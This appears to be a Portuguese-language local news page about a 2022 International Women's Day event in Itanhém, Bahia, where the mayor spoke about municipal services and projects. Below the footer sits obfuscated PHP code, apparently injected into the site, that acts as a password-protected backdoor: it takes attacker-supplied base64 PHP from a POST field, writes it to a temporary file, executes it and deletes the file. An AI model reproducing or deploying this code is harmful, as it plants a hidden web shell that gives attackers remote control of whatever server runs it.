• SEJA BEM-VINDO

Prefeito Mildson Medeiros fala das comemorações do Dia Internacional da Mulher

Publicado em: 17/03/2022 Atualizado:: março 17, 2022

 

Aconteceu nesta quarta-feira (16), o evento programado pela Prefeitura Municipal de Itanhém em parceria com todas as Secretarias Municipais, em alusão ao Dia Internacional da Mulher.

 

O evento denominado “Mulheres em Evidência: Fortalecendo Laços e Empoderando” foi realizado na praça Castro Alves e contou com uma extensa programação ao longo de todo o dia com serviços, celebrações e homenagens especiais à todas as mulheres.

 

 

 

Com o tema “Mulheres em Evidência: Fortalecendo Laços e Empoderando”, teve início às 6h da manhã com a feira livre e dezenas de serviços gratuitos ofertados pelas Secretarias de Saúde, Educação, Administração, Desenvolvimento Social, Desenvolvimento Econômico, Agricultura e pelos Departamentos de Cultura, Meio Ambiente, Esporte e Lazer.

 

Os participantes ainda puderam usufruir dos serviços do Sindicato Rural, SEBRAE, CDL com o “Feirão Limpa Nome”, Incra e da Caixa Econômica Federal, com o “Caixa Aqui Tem, serviços de Saúde, palestras, testes de sífilis, hepatite, HIV e outros mais.

 

 

 

 

O prefeito Mildson Medeiros falou dos atendimentos voltados às mulheres, e destacou o cadastramento das famílias que tiveram prejuízos com as chuvas que castigaram o extremo sul da Bahia no final do ano passado.

 

 

Mildson aproveitou a oportunidade e disse que o evento de hoje vai aconteceu em todo os distritos, parabenizou as mulheres pelo seu dia e concluiu falando de alguns projetos em andamento, como a estruturação do hospital que está funcionando pelo município e já está recebendo novos equipamentos vindos de Salvador através do Consórcio de saúde. Mildson lembrou também dos vários equipamentos odontológicos conquistados em sua gestão que já estão no município.

 

A festa só terminou a noite com condecoração para as Mulheres em Evidência, que se destacaram na sociedade, em diversos segmentos. Para fechar a noite, show musical com o cantor João Só Modão.

 

Fonte: Bahiaextremosul


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}